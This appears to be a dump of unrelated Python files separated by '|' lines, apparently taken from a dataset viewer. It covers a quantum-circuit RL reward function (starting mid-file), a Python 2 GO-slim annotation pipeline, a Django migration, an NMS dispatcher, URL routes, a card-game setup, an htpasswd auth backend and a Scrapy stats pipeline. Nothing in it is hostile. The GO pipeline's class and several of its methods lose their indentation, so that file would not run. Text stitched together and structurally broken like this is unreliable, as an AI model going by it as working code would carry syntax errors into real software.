            state[-1][state[2]!=self.num_qubits] = torch.tensor(result_min_qulacs['x'], dtype=torch.float)
        return state[-1]
    def reward_fn(self, energy):
        """Compute the reward for *energy* according to self.fn_type.
        Uses self.error / self.done_threshold set in step()."""
        if self.fn_type == "staircase":
            return (0.2 * (self.error < 15 * self.done_threshold) +
                    0.4 * (self.error < 10 * self.done_threshold) +
                    0.6 * (self.error < 5 * self.done_threshold) +
                    1.0 * (self.error < self.done_threshold)) / 2.2
        elif self.fn_type == "two_step":
            return (0.001 * (self.error < 5 * self.done_threshold) +
                    1.0 * (self.error < self.done_threshold))/1.001
        elif self.fn_type == "two_step_end":
            # reward only at episode end (success or max depth)
            max_depth = self.actual_layer == (self.num_layers - 1)
            if ((self.error < self.done_threshold) or max_depth):
                return (0.001 * (self.error < 5 * self.done_threshold) +
                        1.0 * (self.error < self.done_threshold))/1.001
            else:
                return 0.0
        elif self.fn_type == "naive":
            return 0. + 1.*(self.error < self.done_threshold)
        elif self.fn_type == "incremental":
            return (self.prev_energy - energy)/abs(self.prev_energy - self.min_eig)
        elif self.fn_type == "incremental_clipped":
            return np.clip((self.prev_energy - energy)/abs(self.prev_energy - self.min_eig),-1,1)
        elif self.fn_type == "nive_fives":
            max_depth = self.actual_layer == (self.num_layers-1)
            if (self.error < self.done_threshold):
                rwd = 5.
            elif max_depth:
                rwd = -5.
            else:
                rwd = 0.
            return rwd
        elif self.fn_type == "incremental_with_fixed_ends":
            max_depth = self.actual_layer == (self.num_layers-1)
            if (self.error < self.done_threshold):
                rwd = 5.
            elif max_depth:
                rwd = -5.
            else:
                rwd = np.clip((self.prev_energy - energy)/abs(self.prev_energy - self.min_eig),-1,1)
            return rwd
        elif self.fn_type == "log":
            return -np.log(1-(energy/self.min_eig))
        elif self.fn_type == "log_neg_punish":
            return -np.log(1-(energy/self.min_eig)) - 5
        elif self.fn_type == "end_energy":
            max_depth = self.actual_layer == (self.num_layers - 1)
            if ((self.error < self.done_threshold) or max_depth):
                rwd = (self.max_eig - energy) / (abs(self.min_eig) + abs(self.max_eig))
            else:
                rwd = 0.0
            return rwd
if __name__ == "__main__":
    # module is import-only; nothing to run directly
    pass
#!/usr/bin/env python2
"""
INPUT - InterProScan result file:
ERR164409.102041_1_142_- eb53bcbf0748558f1f6c087ad5c76bcb 46 Gene3D G3DSA:3.90.1150.10 2 43 9.5E-6 T 18-02-2015 IPR015422 Pyridoxal phosphate-dependent transferase, major region, subdomain 2 GO:0003824|GO:0030170
ERR164409.101777_1_384_- 61af698732af6657579decd4ae9174b4 127 Pfam PF00483 Nucleotidyl transferase 1 122 9.5E-31 T 18-02-2015 IPR005835 Nucleotidyl transferase GO:0009058|GO:0016779 Reactome: REACT_17015
OUTPUT:
Full GO summary file output:
"GO:0055114","oxidation-reduction process","biological_process","8997"
"GO:0008152","metabolic process","biological_process","6400"
GO slim summary file output:
"GO:0030031","cell projection assembly","biological_process","0"
"GO:0071554","cell wall organization or biogenesis","biological_process","12"
"""
import argparse
import json
import os
import subprocess
import sys
import datetime
import time
import re
import collections
import io
import psutil as psutil
__author__ = 'Maxim Scheremetjew EMBL-EBI'
# This script is Python 2 only (print statements below); require >= 2.7
req_version = (2, 7)
cur_version = sys.version_info
if cur_version < req_version:
    print "Your Python interpreter is too old. You need version 2.7.x" # needed for argparse
    sys.exit()
class GOSummaryUtils(object):
@classmethod
def __pathExists(self, path, delay=30):
    """Check whether *path* exists, polling for up to *delay* seconds to
    paper over NFS propagation lag.
    Returns True as soon as the path appears, False after the delay.
    """
    started = datetime.datetime.today()
    while not os.path.exists(path):
        waited = datetime.datetime.today() - started
        if waited.seconds > delay:
            return False
        time.sleep(1)
    return True
@classmethod
def __fileOpen(self, fileName, fileMode, buffer=0):
    """File opening utility that accounts for NFS delays
    Logs how long each file-opening attempt takes
    fileMode should be 'r' or 'w'
    """
    startTime = datetime.datetime.today()
    # print "Fileop: Trying to open file", fileName,"in mode", fileMode, "at", startTime.isoformat()
    if fileMode == 'w' or fileMode == 'wb':
        # touch the file first so the NFS existence poll below can see it
        fileHandle = open(fileName, fileMode)
        fileHandle.close()
        while not os.path.exists(fileName):
            currentTime = datetime.datetime.today()
            timeSoFar = currentTime - startTime
            if timeSoFar.seconds > 30:
                print "Fileop: Took more than 30s to try and open", fileName
                print "Exiting"
                sys.exit(1)
            time.sleep(1)
    try:
        fileHandle = open(fileName, fileMode, buffer)
    except IOError as e:
        print "I/O error writing file{0}({1}): {2}".format(fileName, e.errno, e.strerror)
        print "Exiting"
        sys.exit(1)
    endTime = datetime.datetime.today()
    totalTime = endTime - startTime
    # if totalTime.seconds > 1:
    # print "Fileop: Opened file", fileName, "in mode", fileMode, "in", totalTime.seconds, "seconds"
    return fileHandle
@classmethod
def __goSortKey(self, item):
    """Sort key for summary rows: category ascending, then count descending."""
    category = item[2]
    count = item[3]
    return (category, -count)
@staticmethod
def getFullGOSummary(core_gene_ontology, go2protein_count_dict, topLevelGoIds):
    """Build [(goId, term, category, count), ...] for every annotated GO term,
    skipping the uninformative top-level terms, sorted by category then
    descending count."""
    summary = [
        (goId, term, category, go2protein_count_dict.get(goId))
        for goId, term, category in core_gene_ontology
        # top-level terms tell you nothing, so they are excluded
        if goId in go2protein_count_dict and goId not in topLevelGoIds
    ]
    summary.sort(key=GOSummaryUtils.__goSortKey)
    return summary
@staticmethod
def get_go_slim_summary(go_slim_banding_file, go_slims_2_protein_count):
    """Read the GO-slim banding file and attach per-term protein counts.
    Terms missing from the count dict get a count of 0."""
    summary = []
    file_handler = GOSummaryUtils.__fileOpen(go_slim_banding_file, "r")
    for raw_line in file_handler:
        # only data lines start with a GO identifier
        if not raw_line.startswith("GO"):
            continue
        line_chunks = raw_line.strip().split("\t")
        go_id = line_chunks[0]
        term = line_chunks[1]
        category = line_chunks[2]
        count = go_slims_2_protein_count.get(go_id, 0)
        summary.append((go_id, term, category, count))
    return summary
@staticmethod
def get_gene_ontology(obo_file):
    """
    Parses OBO formatted file.
    Returns a list of (go_id, term, category) triples, one per GO term stanza.
    :param obo_file:
    :return:
    """
    result = []
    handle = GOSummaryUtils.__fileOpen(obo_file, "r")
    # NOTE: 'id' shadows the builtin; kept as-is
    id, term, category = "", "", ""
    for line in handle:
        line = line.strip()
        splitLine = line.split(": ")
        if line.startswith("id:"):
            id = splitLine[1].strip()
        elif line.startswith("name:"):
            term = splitLine[1].strip()
        elif line.startswith("namespace"):
            category = splitLine[1].strip()
        else:
            # any other line ends the triple: flush once all three are set
            # (only GO:-prefixed ids are kept)
            if id.startswith("GO:") and id and term and category:
                item = (id, term, category)
                result.append(item)
                id, term, category = "", "", ""
    handle.close()
    return result
@staticmethod
def parseIprScanOutput(iprscanOutput):
    """Parse a tab-separated InterProScan result file.

    Counts, per GO id, how many proteins carry that annotation (GO ids are
    only taken from InterPro ('IPR...') annotated lines).
    Returns (go2protein_count, ParsingStats).
    """
    # namedtuple type definition
    ParsingStats = collections.namedtuple('ParsingStats',
                                          'num_of_lines num_of_proteins proteins_with_go num_of_unique_go_ids')
    go2protein_count = {}
    num_of_proteins_with_go = 0
    total_num_of_proteins = 0
    line_counter = 0
    if GOSummaryUtils.__pathExists(iprscanOutput):
        handle = GOSummaryUtils.__fileOpen(iprscanOutput, "r")
        goPattern = re.compile(r"GO:\d+")
        previous_protein_acc = None
        previous_num_of_proteins = 0
        go_annotations_single_protein = set()
        for line in handle:
            line_counter += 1
            line = line.strip()
            chunks = line.split("\t")
            # Get protein accession
            current_protein_acc = chunks[0]
            num_of_proteins = len(current_protein_acc.split("|"))
            # On a new accession, flush the GO annotations of the previous one
            if not current_protein_acc == previous_protein_acc:
                # BUG FIX: flush only when there *is* a previous protein, and
                # use the previous protein's own '|' count (the old code passed
                # the new line's count and also double-counted the last protein)
                if previous_protein_acc is not None:
                    if len(go_annotations_single_protein) > 0:
                        num_of_proteins_with_go += 1
                    # NOTE(review): count_and_assign_go_annotations is defined
                    # elsewhere in this class — semantics assumed unchanged
                    GOSummaryUtils.count_and_assign_go_annotations(go2protein_count, go_annotations_single_protein,
                                                                   previous_num_of_proteins)
                total_num_of_proteins += 1
                previous_protein_acc = current_protein_acc
                # reset go id set because we hit a new protein accession
                go_annotations_single_protein = set()
            previous_num_of_proteins = num_of_proteins
            # Parse out GO annotations
            # GO annotations are associated to InterPro entries (InterPro entries start with 'IPR')
            # Than use the regex to extract the GO Ids (e.g. GO:0009842)
            if len(chunks) >= 13 and chunks[11].startswith("IPR"):
                for go_annotation in goPattern.findall(line):
                    go_annotations_single_protein.add(go_annotation)
        # Do final counting for the last protein (BUG FIX: previously the
        # last protein was never counted into proteins_with_go, the total was
        # incremented once too often, and empty input raised a NameError)
        if previous_protein_acc is not None:
            if len(go_annotations_single_protein) > 0:
                num_of_proteins_with_go += 1
            GOSummaryUtils.count_and_assign_go_annotations(go2protein_count, go_annotations_single_protein,
                                                           previous_num_of_proteins)
        handle.close()
    processing_stats = ParsingStats(num_of_lines=line_counter,
                                    num_of_proteins=total_num_of_proteins,
                                    proteins_with_go=num_of_proteins_with_go,
                                    num_of_unique_go_ids=len(go2protein_count))
    return go2protein_count, processing_stats
@staticmethod
def parse_mapped_gaf_file(gaf_file):
    """
    parse_mapped_gaf_file(gaf_file) -> dictionary

    Example of GAF mapped output:
    !gaf-version: 2.0
    ! This GAF has been mapped to a subset:
    ! Subset: user supplied list, size = 38
    ! Number of annotation in input set: 1326
    ! Number of annotations rewritten: 120
    EMG GO:0005839 GO GO:0005839 PMID:12069591 IEA C protein taxon:1310605 20160528 InterPro
    EMG GO:0000160 GO GO:0005575 PMID:12069591 IEA C protein taxon:1310605 20160528 InterPro

    Parsing the above GAF file will create the following dictionary; each
    original GO id (column 2) maps to the SET of slim ids (column 5) it was
    rewritten to:
    result = {'GO:0005839': {'GO:0005839'}, 'GO:0000160': {'GO:0005575'}}
    :param gaf_file: path to the map2slim-mapped GAF file.
    :return: dict mapping original GO ids to sets of mapped (slim) GO ids.
    """
    result = {}
    if GOSummaryUtils.__pathExists(gaf_file):
        handle = GOSummaryUtils.__fileOpen(gaf_file, "r")
        try:
            for line in handle:
                # Lines starting with '!' are GAF header/comment lines.
                if not line.startswith("!"):
                    line = line.strip()
                    splitted_line = line.split("\t")
                    go_id = splitted_line[1]
                    mapped_go_id = splitted_line[4]
                    # One GO id may be rewritten to several slim terms.
                    result.setdefault(go_id, set()).add(mapped_go_id)
        finally:
            # The original leaked the handle; always close it.
            handle.close()
    return result
@staticmethod
def writeGoSummaryToFile(goSummary, outputFile):
    """Write the GO summary as quoted CSV rows: "go","term","category","count"."""
    handle = GOSummaryUtils.__fileOpen(outputFile, "w")
    for go, term, category, count in goSummary:
        fields = [go, term, category, str(count)]
        handle.write('"' + '","'.join(fields) + '"' + "\n")
    handle.close()
@staticmethod
def get_memory_info(process):
"""
get_memory_info(process) -> string
:param process: Represents an OS process object instantiated by module psutil.
:return: Returns the memory usage in MB.
"""
factor = 1024 * 1024
result = "Resident memory: " + str(process.memory_info().rss / factor) + "MB. Virtual memory: " + str(
process.memory_info().vms / factor) + "MB"
return result
@staticmethod
def create_gaf_file(gaf_input_file_path, go_id_set):
"""
:param gaf_input_file_path:
:param go2proteinDict:
:return: nothing
"""
with io.open(gaf_input_file_path, 'w') as file:
file.write(u'!gaf-version: 2.1\n')
file.write(u'!Project_name: EBI Metagenomics\n')
file.write(u'!URL: http://www.ebi.ac.uk/metagenomics\n')
file.write(u'!Contact Email: metagenomics-help@ebi.ac.uk\n')
for go_id in go_id_set:
gaf_file_entry_line_str = 'EMG\t{0}\t{1}\t\t{2}\tPMID:12069591\tIEA\t\t{3}\t\t\tprotein\ttaxon:1310605\t{4}\t{5}\t\t'.format(
go_id,
'GO',
go_id,
'P',
'20160528',
'InterPro')
file.write(u'' + gaf_file_entry_line_str + '\n')
@staticmethod
def count_and_assign_go_annotations(go2protein_count, go_annotations, num_of_proteins):
for go_id in go_annotations:
count = go2protein_count.setdefault(go_id, 0)
count += 1 * num_of_proteins
go2protein_count[go_id] = count
@staticmethod
def count_slims(go_annotations_single_protein, map2slim_mapped_go_ids_dict, num_of_proteins, result):
# count goslims
slim_go_ids_set = set()
# Get the set of slim terms
for go_annotation in go_annotations_single_protein:
mapped_go_ids = map2slim_mapped_go_ids_dict.get(go_annotation)
if mapped_go_ids:
slim_go_ids_set.update(mapped_go_ids)
# Iterate over the set of slim terms and update the counts
for slim_go_id in slim_go_ids_set:
count = result.setdefault(slim_go_id, 0)
count += 1 * num_of_proteins
result[slim_go_id] = count
@staticmethod
def parse_iprscan_output_goslim_counts(iprscanOutput, map2slim_mapped_go_ids_dict):
    """
    Parse the InterProScan TSV output (again) and count proteins per GO slim
    term, using the original-GO -> slim-GO mapping produced by Map2Slim.

    :param iprscanOutput: path to the InterProScan TSV output file.
    :param map2slim_mapped_go_ids_dict: dict mapping GO ids to sets of slim ids.
    :return: dict of slim GO id -> number of occurrences,
             e.g. {'GO:0009842': 267, 'GO:0009841': 566}
    """
    result = {}
    if GOSummaryUtils.__pathExists(iprscanOutput):
        handle = GOSummaryUtils.__fileOpen(iprscanOutput, "r")
        # Raw string so \d reaches the regex engine, e.g. matches GO:0009842
        goPattern = re.compile(r"GO:\d+")
        previous_protein_acc = None
        # '|'-separated multiplicity of the PREVIOUS accession; the flushed
        # annotation set always belongs to the previous protein, so its own
        # multiplicity must be used (the original used the current line's).
        previous_num_of_proteins = 1
        go_annotations_single_protein = set()
        for line in handle:
            line = line.strip()
            chunks = line.split("\t")
            # Get protein accession
            current_protein_acc = chunks[0]
            num_of_proteins = len(current_protein_acc.split("|"))
            # New accession: flush the slim counts for the previous protein
            # (no-op on the very first line since the set is still empty).
            if current_protein_acc != previous_protein_acc:
                GOSummaryUtils.count_slims(go_annotations_single_protein,
                                           map2slim_mapped_go_ids_dict,
                                           previous_num_of_proteins, result)
                previous_protein_acc = current_protein_acc
                previous_num_of_proteins = num_of_proteins
                # reset go id set because we hit a new protein accession
                go_annotations_single_protein = set()
            # GO annotations are associated to InterPro entries
            # (InterPro entries start with 'IPR' in column 12);
            # then the regex extracts the GO ids (e.g. GO:0009842).
            if len(chunks) >= 13 and chunks[11].startswith("IPR"):
                for go_annotation in goPattern.findall(line):
                    go_annotations_single_protein.add(go_annotation)
        # Final flush for the last protein in the file.
        GOSummaryUtils.count_slims(go_annotations_single_protein,
                                   map2slim_mapped_go_ids_dict,
                                   previous_num_of_proteins, result)
        handle.close()
    return result
@staticmethod
def random_word(Length):
from random import randint
assert (1 <= Length <= 26) # Verify 'Length' is within range
charlist = [c for c in "abcdefghijklmnopqrstuvwxyz"]
for i in xrange(0, Length):
other = randint(0, 25)
charlist[i], charlist[other] = charlist[other], charlist[i] # Scramble list by swapping values
word = ""
for c in charlist[0:Length]: word += c
return word.upper()
def run_map2slim(owltools_bin, core_gene_ontology_obo_file, metagenomics_go_slim_ids_file,
                 gaf_input_full_path, gaf_output_full_path):
    # Runs the OWLTools Map2Slim command as a subprocess: maps the annotations
    # in the input GAF file onto the supplied GO slim id set and writes the
    # mapped annotations to the output GAF file.
    # See https://github.com/owlcollab/owltools/wiki/Map2Slim
    # NOTE(review): Python-2-only syntax below ('except X, ex' and print
    # statements); this function cannot run under Python 3 as written.
    try:
        output = subprocess.check_output(
            [
                owltools_bin,
                core_gene_ontology_obo_file,
                '--gaf',
                gaf_input_full_path,
                '--map2slim',
                '--idfile',
                metagenomics_go_slim_ids_file,
                '--write-gaf',
                gaf_output_full_path
            ], stderr=subprocess.STDOUT, )
        # print output
    except subprocess.CalledProcessError, ex:
        # Non-zero exit from owltools: dump everything we know, then re-raise.
        print "--------error------"
        print ex.cmd
        print ex.message
        print ex.returncode
        print ex.output
        raise
    except:
        # Anything else (missing binary, interrupt, ...): report and re-raise.
        print "Unexpected error:", sys.exc_info()[0]
        raise
if __name__ == '__main__':
    # End-to-end GO slim pipeline driver (Python 2):
    #   1. parse an InterProScan TSV result file and count GO annotations,
    #   2. write the full GO summary CSV,
    #   3. build a GAF file from the found GO ids and run OWLTools Map2Slim,
    #   4. re-parse the TSV with the slim mapping and write the slim summary.
    description = "Go slim pipeline."
    # Parse script parameters
    parser = argparse.ArgumentParser(description=description)
    parser.add_argument("-c", "--config",
                        type=file,  # NOTE(review): 'file' as argparse type is Python 2 only
                        help="path to config file",
                        required=False,
                        metavar="configfile",
                        default="config/go_summary-config.json")
    parser.add_argument("-i", "--input-file",
                        help="InterProScan result file.",
                        required=True)
    parser.add_argument("-o", "--output-file",
                        help="GO summary output file.",
                        required=True)
    args = vars(parser.parse_args())
    print "INFO: " + description
    script_pathname = os.path.dirname(sys.argv[0])
    script_full_path = os.path.abspath(script_pathname)
    # InterProScan result file including the GO annotations
    iprscan_output_file = args['input_file']
    output_file = args['output_file']
    if not os.stat(iprscan_output_file).st_size == 0:
        # Get program configuration
        configuration = json.load(args['config'])
        temp_dir = configuration["temp_dir"]
        # Create unique temporary file prefix
        date_stamp = time.strftime("%Y%m%d%H%M%S")
        random_word = GOSummaryUtils.random_word(8)
        temp_file_prefix = date_stamp + "_" + random_word + "_"
        # path to the latest version of the core gene ontology in OBO format
        full_gene_ontology_obo_formatted = ''.join([script_full_path, '/', configuration["full_gene_ontology_obo_file"]])
        # GO slim banding file
        go_slim_banding_file = ''.join([script_full_path, '/', configuration["metagenomics_go_slim_banding_file"]])
        # Map2Slim program parameters
        metagenomics_go_slim_ids_file = ''.join([script_full_path, '/', configuration["metagenomics_go_slim_ids_file"]])
        owltools_bin = ''.join([script_full_path, '/', configuration["owltools_bin_file"]])
        # psutil is a library for retrieving information on running processes
        process = psutil.Process(os.getpid())
        print "Process id: " + str(os.getpid())
        print "Initial memory: " + GOSummaryUtils.get_memory_info(process)
        # Create temporary file names, necessary to run map2slim
        gaf_input_temp_file_path = temp_dir + temp_file_prefix + 'pipeline_input_annotations.gaf'
        gaf_output_temp_file_path = temp_dir + temp_file_prefix + 'pipeline_mapped_annotations.gaf'
        print "Creating temp files under: " + gaf_input_temp_file_path
        # Parse InterProScan result file; map protein accessions and GO terms
        print "Parsing the InterProScan result output file: " + iprscan_output_file
        go2protein_count_dict, processing_stats = GOSummaryUtils.parseIprScanOutput(iprscan_output_file)
        print "Finished parsing."
        print "After parsing the InterProScan result file: " + GOSummaryUtils.get_memory_info(process)
        # Generate GO summary
        print "Loading full Gene ontology: " + full_gene_ontology_obo_formatted
        core_gene_ontology_list = GOSummaryUtils.get_gene_ontology(full_gene_ontology_obo_formatted)
        print "Finished loading."
        print "After loading the full Gene ontology: " + GOSummaryUtils.get_memory_info(process)
        print "Generating full GO summary..."
        # The three GO root terms: biological_process, molecular_function,
        # cellular_component.
        topLevelGoIds = ['GO:0008150', 'GO:0003674', 'GO:0005575']
        full_go_summary = GOSummaryUtils.getFullGOSummary(core_gene_ontology_list, go2protein_count_dict, topLevelGoIds)
        print "After generating the full GO summary: " + GOSummaryUtils.get_memory_info(process)
        # delete core gene ontology list (free memory before the next stage)
        del core_gene_ontology_list
        print "Finished generation."
        print "Writing full GO summary to the following file: " + output_file
        GOSummaryUtils.writeGoSummaryToFile(full_go_summary, output_file)
        # delete full GO summary variable
        del full_go_summary
        print "Finished writing."
        # Generating the GAF input file for Map2Slim
        print "Generating the GAF input file for Map2Slim..."
        go_id_set = go2protein_count_dict.keys()
        # delete GO to protein dictionary variable
        del go2protein_count_dict
        GOSummaryUtils.create_gaf_file(gaf_input_temp_file_path, go_id_set)
        num_of_gaf_entries = len(go_id_set)
        del go_id_set
        print "Finished GAF file generation."
        # Generate GO slim
        # Run Map2Slim for more information on how to use the tool see https://github.com/owlcollab/owltools/wiki/Map2Slim
        print "Memory before running Map2Slim: " + GOSummaryUtils.get_memory_info(process)
        print "Running Map2Slim now..."
        run_map2slim(owltools_bin, full_gene_ontology_obo_formatted, metagenomics_go_slim_ids_file,
                     gaf_input_temp_file_path, gaf_output_temp_file_path)
        print "Map2Slim finished!"
        print "Parsing mapped annotations..."
        go2mapped_go = GOSummaryUtils.parse_mapped_gaf_file(gaf_output_temp_file_path)
        print "Finished parsing."
        print "Getting GO slim counts by parsing I5 TSV again"
        go_slims_2_protein_count = GOSummaryUtils.parse_iprscan_output_goslim_counts(iprscan_output_file, go2mapped_go)
        print "After getting GO slim counts: " + GOSummaryUtils.get_memory_info(process)
        go_slim_summary = GOSummaryUtils.get_go_slim_summary(go_slim_banding_file, go_slims_2_protein_count)
        go_slim_output_file = output_file + '_slim'
        print "Writing GO slim summary to the following file: " + go_slim_output_file
        GOSummaryUtils.writeGoSummaryToFile(go_slim_summary, go_slim_output_file)
        # delete full GO summary variable
        del go_slim_summary
        print "Finished writing."
        # deleting temporary files (best effort; missing files are ignored)
        try:
            os.remove(gaf_input_temp_file_path)
            os.remove(gaf_output_temp_file_path)
        except OSError:
            pass
        except:
            raise
        # NOTE(review): the bare string below has no effect at runtime —
        # presumably a missing 'print' for the statistics banner.
        "============Statistics============"
        print "Parsed " + str(processing_stats.num_of_lines) + " lines in the InterProScan result file."
        print "Found " + str(processing_stats.num_of_proteins) + " proteins in the InterProScan result file."
        print str(processing_stats.proteins_with_go) + " out of " + str(
            processing_stats.num_of_proteins) + " proteins do have GO annotations."
        print "Found " + str(
            processing_stats.num_of_unique_go_ids) + " unique GO identifiers in the InterProScan result file."
        print "Created " + str(num_of_gaf_entries) + " GAF entries to feed Map2Slim."
        print "Program finished."
    else:
        # Empty input: emit empty summary files so downstream steps still
        # find their expected outputs.
        with open("empty.summary.go", "w") as empty_summary:
            empty_summary.close()
        with open("empty.summary.go_slim", "w") as empty_slim:
            empty_slim.close()
        sys.stdout.write("input file empty, writing empty output files")
        sys.stderr.write("input file empty, writing empty output files")
|
from utils.train import train_process

if __name__ == '__main__':
    # Script entry point: all training logic lives in utils.train.
    train_process()
|
# Generated by Django 2.2.6 on 2019-12-02 11:07
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: renames the Task 'input'/'output' fields to
    # '*_hidden' and adds new '*_public' text fields.

    dependencies = [
        ('tasks', '0002_auto_20191029_1004'),
    ]

    operations = [
        migrations.RenameField(
            model_name='task',
            old_name='input',
            new_name='input_hidden',
        ),
        migrations.RenameField(
            model_name='task',
            old_name='output',
            new_name='output_hidden',
        ),
        migrations.AddField(
            model_name='task',
            name='input_public',
            # 'changeme' is a one-off default used to populate existing rows;
            # preserve_default=False drops it from the model afterwards.
            field=models.TextField(default='changeme'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='task',
            name='output_public',
            field=models.TextField(default='changeme'),
            preserve_default=False,
        ),
    ]
|
import numpy as np
import torch
from . import nms_cython_backend, nms_torch_backend
def nms(dets, iou_thr, return_inds=False):
    """Dispatch to either CPU or GPU NMS implementations.

    The input can be either a torch tensor or numpy array. GPU NMS will be used
    if the input is a gpu tensor or device_id is specified, otherwise CPU NMS
    will be used. The returned type will always be the same as inputs.

    Arguments:
        dets (torch.Tensor or np.ndarray): bboxes with scores.
        iou_thr (float): IoU threshold for NMS.
        return_inds (bool): also return kept indices (torch input only).

    Returns:
        tuple: kept bboxes and indice, which is always the same data type as
            the input.
    """
    # Nothing to suppress for an empty detection set.
    if dets.shape[0] == 0:
        if not return_inds:
            return dets
        else:
            # NOTE(review): returning [0] for zero detections looks odd — an
            # empty index list seems more consistent; confirm callers' intent.
            return dets, [0]
    # convert dets (tensor or numpy array) to tensor
    if isinstance(dets, torch.Tensor):
        # sort by score (column 4), highest first, before calling the backend
        inds = torch.argsort(dets[:, 4], descending=True)
        dets = dets[inds].contiguous()
        keep_inds = nms_torch_backend.forward(dets, float(iou_thr)).long()
        dets = dets[keep_inds].contiguous()
        # map kept indices back to positions in the ORIGINAL (unsorted) input
        keep_inds = inds[keep_inds]
    elif isinstance(dets, np.ndarray):
        keep_inds = nms_cython_backend.nms(dets, iou_thr)
        dets = dets[keep_inds]
        # the numpy path does not support returning indices
        assert not return_inds
    else:
        raise TypeError(
            'dets must be either a Tensor or numpy array, but got {}'.format(
                type(dets)))
    if return_inds:
        return dets, keep_inds
    else:
        return dets
|
# Copyright (c) Code Written and Tested by Ahmed Emad in 28/02/2020, 16:53
from django.urls import path
from core.views import RedirectView, ShortenView
app_name = 'core'  # URL namespace, e.g. reverse('core:shorten')

urlpatterns = [
    # Route handled by ShortenView (named 'shorten').
    path('shorten', ShortenView.as_view(), name='shorten'),
    # Catch-all string segment handled by RedirectView (named 'redirect');
    # must come last so it does not shadow the route above.
    path('<str:url>', RedirectView.as_view(), name='redirect')
]
|
from utils.cards import get_deck
from .common import get_turn
def initial_state(players):
    """Build the opening state of a game for *players*.

    The deck is grown in whole-deck increments until it holds at least four
    cards per player plus the 5+4+3+2+1 extra cards.
    """
    min_cards = 4 * len(players) + (5 + 4 + 3 + 2 + 1)
    deck = []
    while len(deck) < min_cards:
        deck.extend(get_deck())
    state = {
        'stage': 'cards',
        'deck': deck,
        'hands': {p: [] for p in players},
    }
    # The turn marker is derived from the freshly built state.
    state['turn'] = get_turn(state)
    return state
|
from django.conf import settings
from django.contrib.auth.models import User
from htauth.htpasswd import check_password, NoSuchUser
class HtauthBackend(object):
    """Django authentication backend that validates credentials against the
    htpasswd file configured in settings.HTAUTH_PASSWD_FILENAME."""
    supports_inactive_user = False

    def authenticate(self, username=None, password=None):
        # Validate the credentials against the htpasswd file; any failure
        # (unknown user or wrong password) yields None, i.e. "not my user".
        password_file = settings.HTAUTH_PASSWD_FILENAME
        try:
            login_valid = check_password(username, password, password_file)
        except NoSuchUser:
            return None
        if not login_valid:
            return None
        try:
            user = User.objects.get(username=username)
        except User.DoesNotExist:
            # Create a new user. Note that we can set password
            # to anything, because it won't be checked; the password
            # from settings.py will.
            #user = User(username=username, password=UNUSABLE_PASSWORD)
            #user.is_staff = True
            #user.is_superuser = True
            #user.save()
            user = User.objects.create_user(username)
        return user

    def get_user(self, user_id):
        # Required backend hook: resolve a session-stored id back to a User.
        try:
            return User.objects.get(pk=user_id)
        except User.DoesNotExist:
            return None
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
from .items import Topic, Reply
from .spiders.tools import get_hour, map_add, sortmap, write_map_to_csv, get_date
class ScrcolgPipeline(object):
    """Scrapy pipeline that aggregates statistics over crawled Topic/Reply
    items (activity per hour and per date, topic types, author activity,
    total counts) and dumps them to CSV files when the spider closes.
    """

    def __init__(self):
        # State is per instance; the original declared these as mutable
        # CLASS attributes, which would be shared by every pipeline instance
        # (a classic shared-mutable-default bug).
        self.hours = {}
        self.dates = {}
        self.topictypes = {}
        self.replyauthors = {}
        self.topicauthors = {}
        self.counttopics = 0
        self.countreplies = 0

    def open_spider(self, spider):
        # Raw text dumps of topic and reply contents.
        # NOTE(review): no explicit encoding — relies on the platform default.
        self.file1 = open('./tempdata/counttopic', 'w')
        self.file2 = open('./tempdata/countreply', 'w')
        return

    def close_spider(self, spider):
        # Report totals and flush all aggregated statistics to CSV.
        print("总共统计帖子数:"+str(self.counttopics))
        print("总共统计回复数:" + str(self.countreplies))
        write_map_to_csv(self.dates, './tempdata/date.csv')
        write_map_to_csv(self.hours, './tempdata/hours.csv')
        write_map_to_csv(sortmap(self.topictypes), './tempdata/topictypes.csv')
        write_map_to_csv(sortmap(self.replyauthors), './tempdata/replyauthors.csv')
        write_map_to_csv(sortmap(self.topicauthors), './tempdata/topicauthors.csv')
        self.file1.close()
        self.file2.close()
        return

    def process_item(self, item, spider):
        # Bucket every item by hour-of-day and by calendar date.
        map_add(get_hour(item['date']), self.hours)
        map_add(get_date(item['date']), self.dates)
        author = item['author']
        line = item['content'] + "\n"
        if isinstance(item, Topic):
            self.counttopics += 1
            # Renamed local so the builtin 'type' is not shadowed.
            topic_type = item['type']
            map_add(topic_type, self.topictypes)
            map_add(author, self.topicauthors)
            self.file1.write(line)
        if isinstance(item, Reply):
            self.countreplies += 1
            map_add(author, self.replyauthors)
            self.file2.write(line)
        return item
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.